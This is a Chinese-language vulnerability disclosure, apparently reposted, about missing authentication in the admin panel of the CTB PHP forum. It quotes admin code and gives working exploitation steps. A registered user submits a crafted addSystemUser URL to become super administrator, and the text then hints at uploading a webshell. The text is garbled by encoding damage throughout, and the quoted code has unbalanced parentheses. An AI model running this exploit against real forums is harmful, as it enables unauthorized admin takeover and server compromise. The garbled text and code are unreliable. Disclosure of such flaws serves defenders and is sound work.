|
|
>>>Dedicated This Scrap To CaoJing<<<
涉及版本:
^^^^^^^
目前所有版本(現(xiàn)在1.3Alpha為最高版本)
描述:
^^^^^^
CTB是一款由實(shí)易數(shù)碼<11cn.org>;開(kāi)發(fā)和維護(hù)的源代碼開(kāi)放的php論壇。由于其后臺(tái)管理文件驗(yàn)證存在缺陷,可能導(dǎo)致非法用戶直接添加論壇超級(jí)管理員,進(jìn)而威脅論壇或服務(wù)器安全。
具體:
^^^^
CTB書寫非常規(guī)范,代碼井然有序,賞心悅目,的確是優(yōu)美的程序;特別是其功能模塊,著實(shí)讓小弟學(xué)習(xí)了一把。但安全方面卻令人堪憂:
試看如下代碼:
/admin/main.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
//獲取get變量
if( is_array($_GET) ) {
foreach($_GET as $k=>$v) {
if( is_array( $_GET[$k]) ) {
foreach($_GET[$k] as $k2=>$v2) {
$return[$k][$k2] = $v2;
}
} else {
$return[$k] = $v;
}
}
}
...
$mod = isset($_GET['mod']) ? $_GET['mod'] : $_POST['mod'];
if (!file_exists($mod.".php" {
$mod = "mainright";
}
require_once ($mod.".php";
//-----------------------------------------------------------------------------
//初始化類變量
$ctb = new Module;
$ctb->set = $set;
$ctb->tplPath = "./templates";
$ctb->input = $return;
$ctb->sess = isset($_COOKIE["sess_adminname"]) ? $_COOKIE : $_SESSION;
$ctb->execute();
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
這里沒(méi)有任何驗(yàn)證,我們看看添加管理員的文件:
/admin/systemuser.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
class Module extends CommonClass
//系統(tǒng)管理模塊子類
{
function execute() {
switch($this->input['action']) {
...
case 'addSystemUser':
$this->addSystemUser();
break;
...
}
}
function addSystemUser()
{
//輸入數(shù)據(jù)簡(jiǎn)單格式化
$this->inputCheck("main.php?mod=systemuser&action=showSystemUser";
//執(zhí)行添加操作
$this->file = "../".$this->set[dataPath]."/users/list.php";
$systemLine = $this->select(4, $this->input['systemUserName']);
....
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
依然沒(méi)有驗(yàn)證,一路順利啊!
利用方法:
^^^^^^^
先注冊(cè)一個(gè)用戶:
登陸ID: cat
用戶名 : dog
密碼: ilikecat
重復(fù)密碼: ilikecat
信箱: cat@dog.com
接著提交如下URL:
http://www.target.com/ctb/admin/main.php?mod=systemuser&systemUserName=dog&systemUserMode=1&action=addSystemUser
哈哈,你現(xiàn)在已經(jīng)是超級(jí)管理員了,不相信?提交如下URL后臺(tái)登陸:
http://www.psych.com/ctb/admin/main.php?mod=login
管理名稱: cat
管理密碼: ilikecat
咦...還真成功了!
你現(xiàn)在是不是想更改后臺(tái)上傳文件類型,然后upload webshell?哼,被我猜到了吧...
后記:另外發(fā)現(xiàn)CTB代碼注釋有些扎眼的錯(cuò)別字,大煞風(fēng)景,希望可以一起修正。
php技術(shù):漂亮但不安全的CTB,轉(zhuǎn)載需保留來(lái)源!
鄭重聲明:本文版權(quán)歸原作者所有,轉(zhuǎn)載文章僅為傳播更多信息之目的,如作者信息標(biāo)記有誤,請(qǐng)第一時(shí)間聯(lián)系我們修改或刪除,多謝。
